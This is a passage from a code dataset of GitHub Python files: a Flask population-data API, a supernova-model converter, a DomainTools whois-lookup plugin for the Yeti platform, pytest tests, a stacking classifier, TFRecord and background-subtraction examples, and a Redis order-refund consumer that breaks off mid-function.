tables\nbase.prepare(engine, reflect=True)\n\n# Save reference to the table\n### update table name\n#table = base.classes.tablename\nun_sex_population = base.classes.un_sex_population\nyoung_to_elder = base.classes.young_to_elder\n\n# Flask Setup\n# Instantiate the Flask application\napp = Flask(__name__)\n\n##### look into page caching\n# disable page caching\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n\n# flask app routes\n# index.html route\n@app.route(\"/\")\ndef IndexRoute():\n ''' This function runs when the browser loads the index route. \n Note that the html file must be located in a folder called templates. '''\n\n webpage = render_template(\"index.html\")\n return webpage\n\n# route to query database for population pyramid \n@app.route(\"/pop_pyramid_data\")\ndef QuerySexPopulation():\n ''' Query the database for population numbers and return the results as a JSON. '''\n\n # Open a session, run the query, and then close the session again\n session = Session(engine)\n #### EXAMPLE RESULTS QUERY BELOW\n #results = session.query(table.country, table.iso3, table.totalpopulation).all()\n ###########\n results = session.query(un_sex_population.r_0_4, \n un_sex_population.r_5_9,\n un_sex_population.r_10_14,\n un_sex_population.r_15_19,\n un_sex_population.r_20_24,\n un_sex_population.r_25_29,\n un_sex_population.r_30_34,\n un_sex_population.r_35_39,\n un_sex_population.r_40_44,\n un_sex_population.r_45_49,\n un_sex_population.r_50_54,\n un_sex_population.r_55_59,\n un_sex_population.r_60_64,\n un_sex_population.r_65_69,\n un_sex_population.r_70_74,\n un_sex_population.r_75_79,\n un_sex_population.r_80_84,\n un_sex_population.r_85_89,\n un_sex_population.r_90_94,\n un_sex_population.r_95_99,\n un_sex_population.r_100_105).all()\n session.close \n\n ###########\n #EXAMPLE DIC LIST BELOW\n ###########\n\n # Create a list of dictionaries, with each dictionary containing one row from the query. 
\n # all_population = []\n # for country, iso3, totalpopulation in results:\n # dict = {}\n # dict[\"country\"] = country\n # dict[\"iso3\"] = iso3\n # dict[\"totalpopulation\"] = totalpopulation\n # all_population.append(dict)\n\n ###########\n sex_population = []\n for r_0_4, r_5_9, r_10_14, r_15_19, r_20_24, r_25_29, r_30_34, r_35_39, r_40_44, r_45_49, r_50_54, r_55_59, r_60_64, r_65_69, r_70_74, r_75_79, r_80_84, r_85_89, r_90_94, r_95_99, r_100_105 in results:\n dict = {}\n\n dict[\"r_0_4\"] = r_0_4\n dict[\"r_5_9\"] = r_5_9 \n dict[\"r_10_14\"] = r_10_14\n dict[\"r_15_19\"] = r_15_19\n dict[\"r_20_24\"] = r_20_24\n dict[\"r_25_29\"] = r_25_29\n dict[\"r_30_34\"] = r_30_34\n dict[\"r_35_39\"] = r_35_39\n dict[\"r_40_44\"] = r_40_44\n dict[\"r_45_49\"] = r_45_49\n dict[\"r_50_54\"] = r_50_54\n dict[\"r_55_59\"] = r_55_59\n dict[\"r_60_64\"] = r_60_64\n dict[\"r_65_69\"] = r_65_69\n dict[\"r_70_74\"] = r_70_74\n dict[\"r_75_79\"] = r_75_79\n dict[\"r_80_84\"] = r_80_84\n dict[\"r_85_89\"] = r_85_89\n dict[\"r_90_94\"] = r_90_94\n dict[\"r_95_99\"] = r_95_99\n dict[\"r_100_105\"] = r_100_105\n \n sex_population.append(dict)\n\n # Return the jsonified result. \n return jsonify(sex_population)\n\n@app.route(\"/age_stacked_area_data\")\ndef QueryAgePopulation():\n ''' Query the database for population numbers and return the results as a JSON. '''\n\n # Open a session, run the query, and then close the session again\n session = Session(engine)\n #### EXAMPLE RESULTS QUERY BELOW\n #results = session.query(table.country, table.iso3, table.totalpopulation).all()\n ###########\n\n results = session.query(young_to_elder.Country, \n young_to_elder.Year, \n young_to_elder.Young, \n young_to_elder.Working_Age, \n young_to_elder.Elder).all()\n session.close \n\n age_population = []\n for Country, Year, Young, Working_Age, Elder in results:\n dict = {}\n dict[\"Country\"] = Country\n dict[\"Young\"] = Young\n dict[\"Working_Age\"] = Working_Age\n dict[\"Elder\"] = Elder\n age_population.append(dict)\n\n # Return the jsonified result. \n return jsonify(age_population)\n\n# This statement is required for Flask to do its job. \n# Think of it as chocolate cake recipe. \nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"anikajohnson/Project-2-US-Pop","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1796476630","text":"# -*- coding: utf-8 -*-\n\"\"\"\nsnewpy.scripts.to_snowglobes\n============================\n\nConvert an arbitrary model to SNOwGLoBES format. Based on SNEWPY.py script by\nE. O'Connor and J. P. 
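The per-column dict building in these routes can be collapsed with zip once the key order matches the query; a sketch with placeholder rows:

rows = [("Kenya", 2000, 0.41), ("Kenya", 2010, 0.38)]       # stand-in query results
keys = ("Country", "Year", "Young")
payload = [dict(zip(keys, row)) for row in rows]
assert payload[0] == {"Country": "Kenya", "Year": 2000, "Young": 0.41}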
Kneller.\n\nThis version will subsample the times in a supernova model, produce energy\ntables expected by SNOwGLoBES, and compress the output into a tarfile.\n\"\"\"\n\nimport numpy as np\nfrom argparse import ArgumentParser\n\nimport os\nimport io\nimport tarfile\n\nimport logging\n\nfrom snewpy.models import *\nfrom snewpy.flavor_transformation import *\n\ndef main(options=None):\n # Parse command-line arguments.\n p = ArgumentParser(description='Convert to SNOwGLoBES format.')\n p.add_argument('infile', nargs=1,\n help='Supernova model input file (Nakazato only).')\n p.add_argument('-o', '--output', default=None,\n help='Output tarfile name (if customization desired)')\n\n tbingroup = p.add_mutually_exclusive_group()\n tbingroup.add_argument('-n', '--ntbins', type=int,\n help='Number of bins used to sample model')\n tbingroup.add_argument('-t', '--deltat', type=float,\n help='Time binning used to sample model [sec]')\n\n p.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Activate verbose log for debugging')\n\n if options is None:\n args = p.parse_args()\n else:\n args = p.parse_args(options)\n\n # Set verbosity of the log.\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n\n # Load up the model. To do: support more than Nakazato format.\n infile = args.infile[0]\n snmodel = Nakazato2013(infile, NoTransformation())\n\n # Subsample the model time. Default to 30 time slices.\n tmin = snmodel.get_time()[0]\n tmax = snmodel.get_time()[-1]\n if args.deltat is not None:\n dt = args.deltat\n elif args.ntbins is not None:\n dt = (tmax - tmin) / (args.ntbins+1)\n else:\n dt = (tmax - tmin) / 31\n\n tedges = np.arange(tmin, tmax, dt)\n times = 0.5*(tedges[1:] + tedges[:-1])\n\n # Generate output.\n if args.output is not None:\n tfname = args.output\n else:\n tfname = infile.replace('.fits', '.SNOformat.tar.bz2')\n\n with tarfile.open(tfname, 'w:bz2') as tf:\n d = 10. 
*1000.*3.086e+18 # luminosity to fluence\n keV = 1e3 * 1.60218e-12 # eV to erg\n MeV = 1e6 * 1.60218e-12\n GeV = 1e9 * 1.60218e-12\n\n energy = np.linspace(0, 100, 501) * MeV\n\n # Loop over sampled times.\n for i, t in enumerate(times):\n osc_spectra = snmodel.get_oscillatedspectra(t, energy)\n osc_fluence = {}\n table = []\n\n table.append('# TBinMid={:g}sec@(tBinWidth={:g}s)(eBinWidth=0.2MeV) Fluence in Number Neutrinos per cm^2'.format(t, dt))\n table.append('# E(GeV) NuE NuMu NuTau aNuE aNuMu aNuTau')\n\n # Generate energy + number flux table.\n for j, E in enumerate(energy):\n for flavor in Flavor:\n osc_fluence[flavor] = osc_spectra[flavor][j] * dt * 200.*keV / (4.*np.pi*d**2)\n \n s = '{:17.8E}'.format(E/GeV)\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_e])\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_x]/2)\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_x]/2)\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_e_bar])\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_x_bar]/2)\n s = '{}{:17.8E}'.format(s, osc_fluence[Flavor.nu_x_bar]/2)\n table.append(s)\n logging.debug(s)\n\n # Encode energy/flux table and output to file in tar archive.\n output = '\\n'.join(table).encode('ascii')\n\n infoname = '{:02d}Tbins/{}-tbin{:02d}.NoOsc.dat'.format(\n len(times),\n os.path.basename(infile).replace('.fits', ''),\n i + 1)\n info = tarfile.TarInfo(name=infoname)\n info.size = len(output)\n\n logging.info('Time {:g} s; writing {} to {}'.format(t, infoname, tfname))\n tf.addfile(info, io.BytesIO(output))\n\n","repo_name":"SNEWS2/snewpy","sub_path":"python/snewpy/scripts/old_to_snowglobes.py","file_name":"old_to_snowglobes.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"42344664903","text":"import hashlib\nimport hmac\nimport json\nimport ssl\nfrom datetime import datetime\n\nimport requests\n\n# from pythonwhois.parse import parse_raw_whois\nfrom mongoengine import FieldDoesNotExist\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.poolmanager import PoolManager\n\nfrom core.analytics import OneShotAnalytics\nfrom core.common.utils import tldextract_parser\nfrom core.config.config import yeti_config\nfrom core.entities import Company\nfrom core.helpers import iterify, get_value_at\nfrom core.observables import Hostname, Email, Text\n\n\ndef link_from_data(observable, data, path, klass, description):\n data = get_value_at(data, path)\n\n if data is None:\n return []\n\n links = set()\n\n for value in iterify(data):\n try:\n node = klass.get_or_create(value=value)\n except FieldDoesNotExist:\n node = klass.get_or_create(name=value)\n\n links.update(observable.active_link_to(node, description, \"DomainTools\"))\n\n return list(links)\n\n\nclass TlsAdapter(HTTPAdapter):\n def init_poolmanager(self, connections, maxsize, block=False):\n self.poolmanager = PoolManager(\n num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=ssl.PROTOCOL_TLSv1_2,\n )\n\n\nclass DomainToolsApi(object):\n settings = {\n \"domaintools_api_username\": {\n \"name\": \"DomainTools API Username\",\n \"description\": \"Username provided for API by DomainTools.\",\n },\n \"domaintools_api_key\": {\n \"name\": \"DomainTools API Key\",\n \"description\": \"API Key provided by DomainTools.\",\n },\n }\n\n API_URL = \"https://api.domaintools.com/v1\"\n\n @staticmethod\n def get(uri, settings, params={}):\n timestamp = 
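The write-generated-bytes-into-a-tar pattern used above (TarInfo plus BytesIO) in isolation; the member name and payload are placeholders:

import io
import tarfile

payload = "# E(GeV) NuE ...\n".encode("ascii")   # placeholder table contents
with tarfile.open("fluence.tar.bz2", "w:bz2") as tf:
    info = tarfile.TarInfo(name="tbin01.dat")
    info.size = len(payload)                     # size must be set before addfile
    tf.addfile(info, io.BytesIO(payload))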
datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n _params = \"{}{}/v1{}\".format(\n settings[\"domaintools_api_username\"].encode(\"ascii\"), timestamp, uri\n )\n signature = hmac.new(\n settings[\"domaintools_api_key\"].encode(\"ascii\"),\n _params,\n digestmod=hashlib.sha1,\n ).hexdigest()\n _params = {\n \"api_username\": settings[\"domaintools_api_username\"],\n \"signature\": signature,\n \"timestamp\": timestamp,\n }\n params.update(_params)\n\n s = requests.Session(proxies=yeti_config.proxy)\n s.mount(\"https://\", TlsAdapter())\n r = s.get(DomainToolsApi.API_URL + uri, params=params)\n r = r.json()\n\n if \"error\" in r:\n raise LookupError(r[\"error\"][\"message\"])\n\n return r\n\n\nclass DTReverseIP(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"Reverse IP\",\n \"description\": \"Reverse IP lookup.\",\n }\n\n ACTS_ON = [\"Ip\"]\n\n @staticmethod\n def analyze(observable, results):\n links = set()\n\n data = DomainToolsApi.get(\n \"/{}/host-domains/\".format(observable.value), results.settings\n )\n results.update(raw=json.dumps(data, indent=2))\n\n for record in data[\"response\"][\"ip_addresses\"][\"domain_names\"]:\n node = Hostname.get_or_create(value=record)\n links.update(node.active_link_to(observable, \"A record\", \"DomainTools\"))\n\n return list(links)\n\n\nclass DTReverseNS(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"DomanTools Reverse NS\",\n \"description\": \"Reverse Name Server lookup.\",\n }\n\n ACTS_ON = [\"Hostname\"]\n\n @staticmethod\n def analyze(observable, results):\n links = set()\n\n data = DomainToolsApi.get(\n \"/{}/name-server-domains\".format(observable.value), results.settings\n )\n results.update(raw=json.dumps(data, indent=2))\n\n for record in (\n data[\"response\"][\"primary_domains\"] + data[\"response\"][\"secondary_domains\"]\n ):\n node = Hostname.get_or_create(value=record)\n links.update(node.active_link_to(observable, \"NS record\", \"DomainTools\"))\n\n return list(links)\n\n\nclass DTWhoisHistory(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"Whois History\",\n \"description\": \"Whois History lookup.\",\n }\n\n ACTS_ON = [\"Hostname\"]\n\n @staticmethod\n def analyze(observable, results):\n links = set()\n parts = tldextract_parser(observable.value)\n\n if parts.subdomain == \"\":\n data = DomainToolsApi.get(\n \"/{}/whois/history\".format(observable.value), results.settings\n )\n results.update(raw=json.dumps(data, indent=2))\n\n for record in data[\"response\"][\"history\"]:\n created = datetime.strptime(\n record[\"whois\"][\"registration\"][\"created\"], \"%Y-%m-%d\"\n )\n expires = datetime.strptime(\n record[\"whois\"][\"registration\"][\"expires\"], \"%Y-%m-%d\"\n )\n\n registrar = Company.get_or_create(\n name=record[\"whois\"][\"registration\"][\"registrar\"]\n )\n registrant = Text.get_or_create(value=record[\"whois\"][\"registrant\"])\n\n links.update(\n observable.link_to(\n registrar, \"Registrar\", \"DomainTools\", created, expires\n )\n )\n links.update(\n observable.link_to(\n registrant, \"Registrant\", \"DomainTools\", created, expires\n )\n )\n\n parsed = parse_raw_whois([record[\"whois\"][\"record\"]], normalized=True)\n email = get_value_at(parsed, \"contacts.registrant.email\")\n if email:\n email = Email.get_or_create(value=email)\n links.update(\n observable.link_to(\n email, \"Registrant Email\", \"DomainTools\", created, expires\n )\n )\n\n return 
list(links)\n\n\nclass DTReverseWhois(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"DomainTools Reverse Whois\",\n \"description\": \"Reverse Whois lookup.\",\n }\n\n ACTS_ON = [\"Text\", \"Email\"]\n\n @staticmethod\n def analyze(observable, results):\n links = []\n\n params = {\"terms\": observable.value, \"mode\": \"purchase\"}\n data = DomainToolsApi.get(\"/reverse-whois/\", results.settings, params)\n\n for domain in data[\"response\"][\"domains\"]:\n node = Hostname.get_or_create(value=domain)\n links += node.active_link_to(\n observable, \"Registrant Information\", \"DomainTools\"\n )\n\n return links\n\n\nclass DTWhois(OneShotAnalytics, DomainToolsApi):\n default_values = {\n \"group\": \"DomainTools\",\n \"name\": \"DomainTools Whois\",\n \"description\": \"Whois lookup with parsed results.\",\n }\n\n ACTS_ON = [\"Hostname\", \"Ip\"]\n\n @staticmethod\n def analyze_domain(observable, data):\n fields = [\n (\n \"response.parsed_whois.contacts.registrant.email\",\n Email,\n \"Registrant Email\",\n ),\n (\"response.parsed_whois.contacts.registrant.name\", Text, \"Registrant Name\"),\n (\n \"response.parsed_whois.contacts.registrant.org\",\n Text,\n \"Registrant Organization\",\n ),\n (\n \"response.parsed_whois.contacts.registrant.phone\",\n Text,\n \"Registrant Phone Number\",\n ),\n (\"response.parsed_whois.name_servers\", Hostname, \"NS record\"),\n ]\n\n links = []\n\n for field in fields:\n links += link_from_data(observable, data, *field)\n\n return links\n\n @staticmethod\n def analyze_ip(observable, data):\n return link_from_data(\n observable, data, \"response.registrant\", Company, \"Hosting\"\n )\n\n @staticmethod\n def analyze(observable, results):\n links = []\n parts = tldextract_parser(observable.value)\n\n if parts.subdomain == \"\":\n should_add_context = False\n for context in observable.context:\n if context[\"source\"] == \"whois\":\n break\n else:\n should_add_context = True\n context = {\"source\": \"whois\"}\n\n data = DomainToolsApi.get(\n \"/{}/whois/parsed\".format(observable.value), results.settings\n )\n results.update(raw=json.dumps(data, indent=2))\n context[\"raw\"] = data[\"response\"][\"whois\"]\n\n if isinstance(observable, Hostname):\n links = DTWhois.analyze_domain(observable, data)\n else:\n links = DTWhois.analyze_ip(observable, data)\n\n if should_add_context:\n observable.add_context(context)\n else:\n observable.save()\n\n print(links)\n\n return links\n","repo_name":"yeti-platform/yeti","sub_path":"plugins/analytics/public/domain_tools.py","file_name":"domain_tools.py","file_ext":"py","file_size_in_byte":9192,"program_lang":"python","lang":"en","doc_type":"code","stars":1485,"dataset":"github-code","pt":"21"} +{"seq_id":"20053788911","text":"import pytest\n\n\nfrom truck import Truck\n\ndef test_apply_brakes_when_truck_object_is_in_motion_returns_current_speed(truck):\n # Arrange\n truck.start_engine()\n truck.accelerate()\n truck.accelerate()\n current_speed = 70\n\n # Act\n truck.apply_brakes()\n\n # Assert\n assert truck.current_speed == current_speed\n\n@pytest.mark.parametrize(\n \"\"\"color, max_speed, acceleration, tyre_friction,\n max_cargo_weight, current_speed\"\"\", [\n ('Red', 200, 50, 20, 180, 30), ('Blue', 150, 25, 25, 100, 0),\n ('Black', 250, 20, 30, 100, 0)])\ndef test_apply_breaks_when_truck_object_current_speed_is_more_than_or_equal_to_truck_object_tyre_friction_returns_current_speed(color, max_speed, acceleration, tyre_friction, max_cargo_weight, current_speed):\n # 
Arrange\n truck = Truck(color=color, max_speed=max_speed, acceleration=acceleration,\n tyre_friction=tyre_friction,\n max_cargo_weight=max_cargo_weight)\n truck.start_engine()\n truck.accelerate()\n\n # Act\n truck.apply_brakes()\n\n # Assert\n assert truck.current_speed == current_speed\n\ndef test_apply_breaks_when_truck_object_current_speed_is_less_than_truck_object_tyre_friction_returns_zero():\n # Arrange\n truck = Truck(color='Red', max_speed=200, acceleration=40,\n tyre_friction=15, max_cargo_weight=80)\n truck.start_engine()\n truck.accelerate()\n current_speed_when_less_than_tyre_friction = 0\n\n # Act\n truck.apply_brakes()\n truck.apply_brakes()\n truck.apply_brakes()\n\n # Assert\n assert truck.current_speed == current_speed_when_less_than_tyre_friction\n\ndef test_apply_breaks_when_truck_object_current_speed_is_equal_to_truck_object_tyre_friction_returns_current_speed():\n # Arrange\n truck = Truck(color='Red', max_speed=200, acceleration=40,\n tyre_friction=10, max_cargo_weight=90)\n truck.start_engine()\n truck.accelerate()\n current_speed = 10\n\n # Act\n truck.apply_brakes()\n truck.apply_brakes()\n truck.apply_brakes()\n\n # Assert\n assert truck.current_speed == current_speed\n","repo_name":"GVK289/aws_folders","sub_path":"clean_code/clean_code_submissions/clean_code_assignment_002/tests/test_truck_apply_breaks.py","file_name":"test_truck_apply_breaks.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"30391426629","text":"import sklearn as sk\nimport numpy as np\nimport h5py\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV\nimport xgboost as xgb\nfrom xgboost.sklearn import XGBClassifier\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.linear_model import LogisticRegression\nimport os\nimport sys\n\nsys.path.insert(1, os.path.join(sys.path[0], '../utils'))\nfrom utilities import calculate_accuracy\n\n\ndef prepare_data(datatype):\n workspace = \"/home/ccyoung/Downloads/dcase2018_task1-master\"\n truncation_dir = os.path.join(workspace, 'features', 'truncation',\n 'holdout_fold={}'.format(1))\n if datatype == 'train':\n hf = h5py.File(os.path.join(truncation_dir, 'train_hpss_6800.h5'), 'r')\n features = hf['feature'][:]\n targets = hf['target'][:]\n return features, np.argmax(targets, axis=-1)\n elif datatype == 'validate':\n hf = h5py.File(os.path.join(truncation_dir, 'validate_hpss_6800.h5'), 'r')\n features = hf['feature'][:]\n targets = hf['target'][:]\n return features, np.argmax(targets, axis=-1)\n\n\ndef stack_one_stage():\n ## 1. Prepare the data\n '''Build the training dataset'''\n X, y = prepare_data('train')\n X_predict, y_predict = prepare_data('validate')\n print(y_predict.shape)\n # y = np.argmax(y, axis=-1)\n # y_predict = np.argmax(y_predict, axis=-1)\n\n ## 2. Define the K first-stage models\n '''The individual base models used in the model fusion'''\n clfs = [\n RandomForestClassifier(n_estimators=390, random_state=10, n_jobs=4,\n max_features=1, min_samples_leaf=1, max_depth=13, ),\n SVC(C=0.6, gamma=1e-4, random_state=10)]\n ## 3. Store all first-stage model outputs, shape=(num predicted samples, predictions of the models), as the second-stage feature input\n dataset_blend_train = np.zeros((X.shape[0], len(clfs)))\n dataset_blend_test = np.zeros((X_predict.shape[0], len(clfs)))\n print(dataset_blend_train.shape)\n print(dataset_blend_test.shape)\n # 4. 
First-stage training: run cross-validated training for each model separately, and aggregate all predictions as new features\n '''5-fold stacking'''\n n_folds = 5\n skf = StratifiedKFold(n_folds)\n for j, clf in enumerate(clfs):\n\n dataset_blend_test_j = np.zeros((X_predict.shape[0], n_folds)) # collects the cross-validation results\n\n ## cross-validated training\n for i, (train, test) in enumerate(skf.split(X, y)): # iterate over the folds; train and test are both index arrays\n '''Use the i-th part for prediction and the remaining parts to train the model; its predicted output becomes the new feature of the i-th part.'''\n print(\"Fold\", i)\n X_train, y_train, X_test, y_test = X[train], y[train], X[test], y[test]\n clf.fit(X_train, y_train)\n y_submission = clf.predict(X_test)\n dataset_blend_train[test, j] = y_submission # store each model's K-fold predictions\n dataset_blend_test_j[:, i] = clf.predict(X_predict)\n '''For the test set, directly use the mean of these k models' predictions as the new feature.'''\n dataset_blend_test[:, j] = dataset_blend_test_j.mean(1) # average the per-fold results\n # print(\"auc Score: %f\" % calculate_accuracy(np.argmax(y_predict, axis=-1), dataset_blend_test[:, j], classes_num=10,\n # average='macro'))\n\n ##5. Second-stage training: train a new model on the new training set produced by the first stage, and predict again on the new test set\n np.save('data.npz', dataset_blend_train)\n np.save('label.npz', dataset_blend_test)\n\n\ndef stack_two_stage():\n X, y = prepare_data('train')\n X_predict, y_predict = prepare_data('validate')\n dataset_blend_train = np.load('data.npz.npy')\n dataset_blend_test = np.load('label.npz.npy')\n\n clf = GradientBoostingClassifier(learning_rate=0.005,subsample=0.8,random_state=10,n_estimators=600)\n clf.fit(dataset_blend_train, y)\n y_submission = clf.predict(dataset_blend_test)\n\n # print(\"Linear stretch of predictions to [0,1]\")\n # y_submission = (y_submission - y_submission.min()) / (y_submission.max() - y_submission.min())\n print(\"blend result\")\n print(\"auc Score: %f\" % (\n calculate_accuracy(y_predict, y_submission, classes_num=10, average='macro')))\n\n\nif __name__ == '__main__':\n stack_two_stage()\n","repo_name":"rongxuanhong/task1","sub_path":"keras/classifier_fusion.py","file_name":"classifier_fusion.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"3538568884","text":"# -*- coding: utf-8 -*-\r\nimport tensorflow as tf\r\nimport os\r\n\r\n# Create an integer-type feature\r\ndef _int64_feature(value):\r\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\r\n\r\nnum_shards = 2\r\ninstance_per_shard = 10\r\n\r\nfor i in range(num_shards):\r\n filename = 'model/data.tfrecord-%.5d-of%.5d' %(i,num_shards)\r\n writer = tf.python_io.TFRecordWriter(filename)\r\n for j in range(instance_per_shard):\r\n example = tf.train.Example(features=tf.train.Features(feature={\r\n 'i':_int64_feature(i),\r\n 'j':_int64_feature(j)\r\n }))\r\n writer.write(example.SerializeToString())\r\n writer.close()\r\n\r\n\r\ntf_record_pattern = os.path.join( 'model/', 'data.tfrecord-*' )\r\ndata_files = tf.gfile.Glob( tf_record_pattern )\r\nfilename_quene = tf.train.string_input_producer(data_files,shuffle=False)\r\n\r\nreader = tf.TFRecordReader()\r\n_, serialized_example = reader.read(filename_quene)\r\n\r\nfeatures = tf.parse_single_example(serialized_example,features={\r\n 'i': tf.FixedLenFeature([],tf.int64),\r\n 'j': tf.FixedLenFeature( [], tf.int64),\r\n})\r\n\r\nwith tf.Session() as sess:\r\n tf.global_variables_initializer().run()\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(sess = sess, coord = coord)\r\n for i in range(15):\r\n print(sess.run([features['i'],features['j']]))\r\n\r\n coord.request_stop()\r\n 
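# block until all queue-runner threads launched above have terminated\r\n 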
coord.join(threads)","repo_name":"WanJunCode/tensorflow","sub_path":"第七章/new/写入数据.py","file_name":"写入数据.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26950120387","text":"import numpy as np\nimport PIL.Image\nfrom matplotlib import pyplot as plt\n\ndef gaussian_mix():\n K = 3\n \n my = 0.5 * np.ones((288, 384, K, 3))\n #my = my / np.linalg.norm(my)\n\n sigma_squared = 0.05 * np.ones((288, 384, K, 3))\n #sigma_squared = sigma_squared / np.linalg.norm(sigma_squared[0, 0, :, :])\n sigma_init_squared = np.array((0.05, 0.05, 0.05))\n \n w = np.ones((288, 384, K))\n w = w / K\n w_init = 1.0/K\n \n lamb = 3.0\n T = 0.8\n alpha = 1.0/600.0\n\n B_hat = np.zeros((288, 384))\n B = np.zeros((288, 384))\n \n for f in range(20, 50):\n print(f)\n file_name = '../../frames2/Walk1{:03d}.jpg'.format(f)\n frame = np.asarray(PIL.Image.open(file_name))\n frame = frame / 255.0\n \n c = np.zeros(K)\n p = np.zeros((288, 384, K))\n\n for x in range(frame.shape[0]):\n for y in range(frame.shape[1]):\n match = False\n for k in range(K):\n dk_squared = np.sum(np.power(frame[x, y, :] - my[x, y, k, :], 2) / sigma_squared[x, y, k, :])\n\n if np.sqrt(dk_squared) < lamb: \n if not match:\n m = k\n elif w[x, y, k]/np.sqrt(np.linalg.norm(sigma_squared[x, y, k])) > (w[x, y, m]/np.sqrt(np.linalg.norm(sigma_squared[x, y, m]))):\n m = k\n \n match = True\n \n if not match:\n m = K - 1\n w[x, y, m] = w_init\n my[x, y, m] = frame[x,y]\n sigma_squared[x, y, m] = sigma_init_squared\n else:\n w[x, y, m] = (1 - alpha)*w[x, y, m] + alpha\n p[x, y, m] = alpha / w[x, y, m]\n my[x, y, m] = (1-p[x, y, m])*my[x, y, m] + p[x, y, m]*frame[x,y]\n sigma_squared[x, y, m] = (1-p[x, y, m])*sigma_squared[x, y, m] + np.multiply((p[x, y, m]*(frame[x,y]-my[x, y, m])), (frame[x,y] - my[x, y, m]))\n\n w[x, y, :] = w[x, y, :] / np.sum(w[x, y, :])\n\n for k in range(K):\n c[k] = w[x, y, k]/np.sqrt(np.linalg.norm(sigma_squared[x, y, k]))\n\n if match:\n #print(c)\n indices = np.argsort(-c)\n #print(indices)\n w[x, y] = w[x, y, indices]\n my[x, y] = my[x, y, indices]\n sigma_squared[x, y] = sigma_squared[x, y, indices]\n \n i = 0\n\n for i in range(K):\n if np.sum(w[x, y, 0:i]) > T:\n #print(\"BREAK\")\n break\n \n B[x, y] = i #???\n #print(i)\n\n for x in range(frame.shape[0]):\n for y in range(frame.shape[1]):\n B_hat[x, y] = 0\n for k in range(int(B[x, y])):\n dk_squared = np.sum(np.power(frame[x, y, :] - my[x, y, k, :], 2) / sigma_squared[x, y, k, :])\n \n if np.sqrt(dk_squared) < lamb:\n B_hat[x,y] = 1\n plt.figure(f)\n plt.imshow(B_hat, cmap=\"gray\")\n\n plt.show()\n\n return B_hat\n\ngaussian_mix()","repo_name":"johanforslund/background-modelling","sub_path":"bg_modelling/gmm/gaussian_mix.py","file_name":"gaussian_mix.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72416692853","text":"\"\"\"\nThis script is responsible for processing payment and inventory related messages from Redis streams.\n\"\"\"\n\nfrom inventory.main import redis\nimport time\n\n\n# Payment consumer setup\npayment_key = 'refund_order'\npayment_group = 'payment-group'\npayment_consumer = 'payment-consumer'\n\n# Inventory consumer setup\ninventory_key = 'order_completed'\ninventory_group = 'inventory-group'\ninventory_consumer = 'inventory-consumer'\n\n\ndef create_group(stream_key, group_name):\n \"\"\"\n Create a consumer group for a given stream.\n\n Args:\n 
stream_key (str): The Redis stream key.\n group_name (str): The name of the consumer group.\n\n Returns:\n None\n \"\"\"\n try:\n redis.xgroup_create(stream_key, group_name, mkstream=True)\n except Exception as e:\n if \"BUSYGROUP\" not in str(e):\n print(f\"Error creating group: {str(e)}\")\n else:\n print('Group already exists!')\n\n\ncreate_group(payment_key, payment_group)\ncreate_group(inventory_key, inventory_group)\n\n\ndef read_stream(group, consumer, key):\n \"\"\"\n Read messages from a Redis stream.\n\n Args:\n group (str): The name of the consumer group.\n consumer (str): The name of the consumer.\n key (str): The Redis stream key.\n\n Returns:\n list: A list of tuples, where each tuple represents a message.\n \"\"\"\n while True:\n try:\n return redis.xreadgroup(group, consumer, streams={key: '>'}, count=1)\n except Exception as e:\n print(f\"Error reading stream: {str(e)}\")\n time.sleep(1)\n\n\ndef process_payment(results):\n \"\"\"\n Process payment messages from the Redis stream.\n\n Args:\n results (list): A list of tuples, where each tuple represents a message.\n\n Returns:\n None\n \"\"\"\n if not results:\n return\n\n for result in results:\n obj = result[1][0][1]\n try:\n order_pk = obj['pk']\n order_key = f':payment.main.Order:{order_pk}'\n order_data = redis.hgetall(order_key)\n if order_data:\n redis.hmset(order_key, {\"status\": str(\"refunded\").encode()})\n print(f\"Refunded order: {obj['pk']}\")\n redis.xack(payment_key, payment_group, result[1][0][0])\n except Exception as e:\n print(f\"Error refunding order: {str(e)}\")\n\n\ndef process_inventory(results):\n \"\"\"\n Process inventory messages from the Redis stream.\n\n Args:\n results (list): A list of tuples, where each tuple represents a message.\n\n Returns:\n None\n \"\"\"\n if not results:\n return\n\n for result in results:\n 